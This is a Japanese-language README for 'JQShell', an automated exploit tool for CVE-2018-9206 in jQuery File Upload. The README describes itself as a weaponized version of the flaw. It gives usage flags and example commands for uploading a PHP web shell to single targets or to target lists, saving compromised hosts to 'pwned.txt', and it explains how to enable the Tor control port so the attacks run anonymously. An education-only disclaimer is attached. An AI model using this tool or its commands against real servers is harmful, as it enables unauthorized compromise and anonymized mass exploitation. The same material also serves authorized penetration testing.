
CVE-2018-9206(jQuery File Upload)向けの自動エクスプロイトツール。単一/複数ターゲットのスキャン、Torプロキシサポート、出力ログ機能を備え、ペネトレーションテストおよび教育目的で使用します。

JQShell
CVE-2018-9206の武器化バージョン。
免責事項
これを管理していないサーバーに対して使用することは、ほとんどの国で違法です。 著者は、本ソフトウェアを違法目的で使用する者の行為について一切の責任を負いません。 本ソフトウェアは教育目的のみを意図しています。 本ソフトウェアの作成において、違法にサーバーを侵害したものはありません。
機能
前提条件
必要なパッケージをインストールしてください。
Python3
pip3 install requests pysocks subprocess stem
Torコントロールポート
このスクリプトでTorを使用するには、torrcファイルを編集してTorコントロールポートを9051で有効にする必要があります。
通常、このファイルは /etc/tor/torrc にあります。
このファイルを開き、次の行を変更します。
#ControlPort 9051
から
ControlPort 9051
に変更します。
torサービスを再起動します。
使用方法
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
[-o OUTPUTZ] [-tor]
optional arguments:
-h, --help このヘルプメッセージを表示して終了します
-l LIST_INIT, --list LIST_INIT
悪用するアセットのリストを選択します
-t SINGLE_TARGET, --target SINGLE_TARGET
単一の悪用ターゲット
-s SHELL_LOC, --shell SHELL_LOC
必須です。シェルのフルパスを指定してください
-o OUTPUTZ, --output OUTPUTZ
確認済みホストのリストを保存するフルパス
-tor, --tor_proxy Torがインストールされている場合に選択します。コントロールポートを有効にする必要があります
例
単一ターゲットに対して実行。
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
単一ターゲットに対して実行、出力を保存。
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
リストに対して実行、出力を保存。
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
著者